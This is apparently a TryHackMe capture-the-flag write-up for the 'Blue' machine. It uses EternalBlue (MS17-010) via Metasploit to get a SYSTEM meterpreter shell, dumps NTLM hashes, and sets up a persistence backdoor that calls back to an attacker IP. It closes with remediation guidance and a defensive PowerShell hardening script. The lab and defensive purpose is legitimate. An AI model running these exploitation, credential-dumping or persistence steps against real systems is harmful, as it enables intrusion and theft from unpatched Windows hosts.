Blue

TryHackMe Easy Windows
#eternalblue #ms17-010 #windows #metasploit #smb

Introduction

Blue is a beginner-friendly Windows machine from TryHackMe built around EternalBlue, the well-known SMBv1 exploit for MS17-010. The exploit was leaked by the Shadow Brokers and was later used to spread the WannaCry ransomware.

Enumeration

Initial Scan

nmap -sV -sC -p- 10.10.x.x

Key Findings:

  • Port 135/tcp - Microsoft Windows RPC
  • Port 139/tcp - NetBIOS
  • Port 445/tcp - Microsoft-DS (SMB)
  • Port 3389/tcp - Remote Desktop Protocol (RDP)

SMB Vulnerability Scanning

Using nmap’s SMB vulnerability scripts:

nmap -p445 --script smb-vuln-ms17-010 10.10.x.x

Result confirms the machine is vulnerable to MS17-010 (EternalBlue).

Exploitation

Using Metasploit

Launch Metasploit and configure the exploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
exploit

After a few moments, we get a meterpreter session!

Gaining System Access

The exploit provides us with NT AUTHORITY\SYSTEM privileges immediately.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Flag Retrieval

Finding the Flags

Use meterpreter’s search functionality:

meterpreter > search -f flag*.txt

Navigate to each flag location and retrieve them:

# User flag (meterpreter strips unescaped backslashes, so use forward slashes or double them)
cat C:/Users/Jon/Desktop/flag1.txt

# Root flag
cat C:/Windows/System32/config/flag2.txt

Post-Exploitation

Dumping Credentials

Use meterpreter’s hashdump functionality:

meterpreter > hashdump

This dumps the NTLM hashes of the local accounts stored in the SAM.

Persistence

For learning purposes, we can create a persistent backdoor:

meterpreter > run persistence -X -i 5 -p 4444 -r 10.10.14.5

Note: Only do this in authorized testing environments!

Key Takeaways

  1. Patch Management is Critical: MS17-010 was patched in March 2017, yet many systems remain vulnerable
  2. SMB Exposure: Exposing SMB to the internet is extremely dangerous
  3. Network Segmentation: Critical systems should be isolated from untrusted networks
  4. Monitoring: SMB traffic should be monitored for suspicious activity

Remediation

  • Apply the security updates from Microsoft Security Bulletin MS17-010
  • Disable SMBv1 protocol
  • Implement network segmentation
  • Use host-based firewalls to restrict SMB access
  • Enable Windows Defender and keep it updated
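The following PowerShell script is an added example (not part of the original writeup or of TryHackMe's material) that turns the Monitoring takeaway and the Remediation list above into something you can run on a host: it checks for an MS17-010 update, turns on SMBv1 access auditing so you can see which clients still need SMBv1 before you cut it off, disables SMBv1, scopes inbound TCP 445 to a management subnet, and checks Defender's state. Assumptions: the KB list is a partial set of the March 2017 MS17-010 updates and must be verified against the bulletin for the host's build (cumulative updates on newer builds supersede them), the 10.10.14.0/24 management subnet is a constructed placeholder, and the Smb*, NetSecurity and Defender cmdlets need Windows 8/Server 2012 or later (Windows 7 gets the registry fallback from Microsoft's guidance).

```powershell
#Requires -RunAsAdministrator
# Added example: audit and harden a Windows host against SMBv1 / MS17-010 exposure.
# Run in an elevated PowerShell session; review each step before applying it in production.

# ASSUMPTION: partial list of KBs that shipped the MS17-010 fix (Win7/2008R2, 8.1/2012R2, 2012).
# Verify against the bulletin for your build; later rollups supersede these on newer builds.
$Ms17010Kbs       = @('KB4012212','KB4012215','KB4012213','KB4012216','KB4012214','KB4012217')
$ManagementSubnet = '10.10.14.0/24'   # ASSUMPTION: constructed placeholder, set to your admin network

# 1. Patch check: look for one of the MS17-010 KBs in the installed hotfix list.
$installed = Get-HotFix | Where-Object { $Ms17010Kbs -contains $_.HotFixID }
if ($installed) {
    "MS17-010 update present: $($installed.HotFixID -join ', ')"
} else {
    "WARNING: no MS17-010 KB listed. On cumulative-update builds a newer rollup may supersede it; verify manually."
}

# 2. Current SMB server state (Win 8 / 2012 and later).
$smb = Get-SmbServerConfiguration
"SMB1 enabled: $($smb.EnableSMB1Protocol)  SMB1 auditing: $($smb.AuditSmb1Access)"

# 3. Monitoring: audit SMB1 access before disabling it. Each SMB1 session is logged as
#    event ID 3000 in Microsoft-Windows-SMBServer/Audit with the client address in the message.
Set-SmbServerConfiguration -AuditSmb1Access $true -Force
$smb1Clients = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-SMBServer/Audit'; Id = 3000 } -ErrorAction SilentlyContinue |
    ForEach-Object { if ($_.Message -match 'Client Address:\s*(\S+)') { $Matches[1] } } |
    Sort-Object -Unique
if ($smb1Clients) {
    "Clients still using SMB1 (migrate these before step 4):"
    $smb1Clients
} else {
    "No SMB1 client activity audited yet; leave auditing on for a while before disabling."
}

# 4. Disable SMBv1 on the server side (-Force skips the confirmation prompt).
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
if (Get-Command Disable-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
    # Win 8.1 / 10 / 2012 R2+: remove the optional feature so the SMB1 driver is gone entirely.
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
} else {
    # Windows 7 / 2008 R2 fallback from Microsoft's guidance: registry value under LanmanServer.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
        -Name SMB1 -Type DWORD -Value 0 -Force
}

# 5. Host firewall: default-deny inbound, disable the broad built-in SMB allow rule, then allow
#    TCP 445 only from the management subnet. (An explicit Block rule would override an Allow
#    rule, so scoping the Allow under a default-deny policy is the correct shape.)
Set-NetFirewallProfile -All -DefaultInboundAction Block
Get-NetFirewallRule -DisplayName 'File and Printer Sharing (SMB-In)' -ErrorAction SilentlyContinue | Disable-NetFirewallRule
New-NetFirewallRule -DisplayName 'SMB 445 from management only' -Direction Inbound -Protocol TCP `
    -LocalPort 445 -RemoteAddress $ManagementSubnet -Action Allow | Out-Null

# 6. Defender: confirm real-time protection is on and signatures are recent (Win 10 / 2016+).
$mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
if ($mp) {
    "Defender AV enabled: $($mp.AntivirusEnabled)  signatures updated: $($mp.AntivirusSignatureLastUpdated)"
    Update-MpSignature -ErrorAction SilentlyContinue
}
```

The audit step is the one most people skip: disabling SMBv1 on a file server that legacy devices (old printers, NAS boxes, embedded systems) still depend on causes an outage, and the 3000 events give you the list of clients to fix first. Step 5 deliberately avoids adding a Block rule for port 445, because in Windows Firewall an explicit block always wins over an allow, which would also lock out the management subnet.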

Tools & Resources

Timeline

  • Initial Access: 5 minutes (exploit execution)
  • Privilege Escalation: N/A (exploit provides SYSTEM access)
  • Total Time: ~15 minutes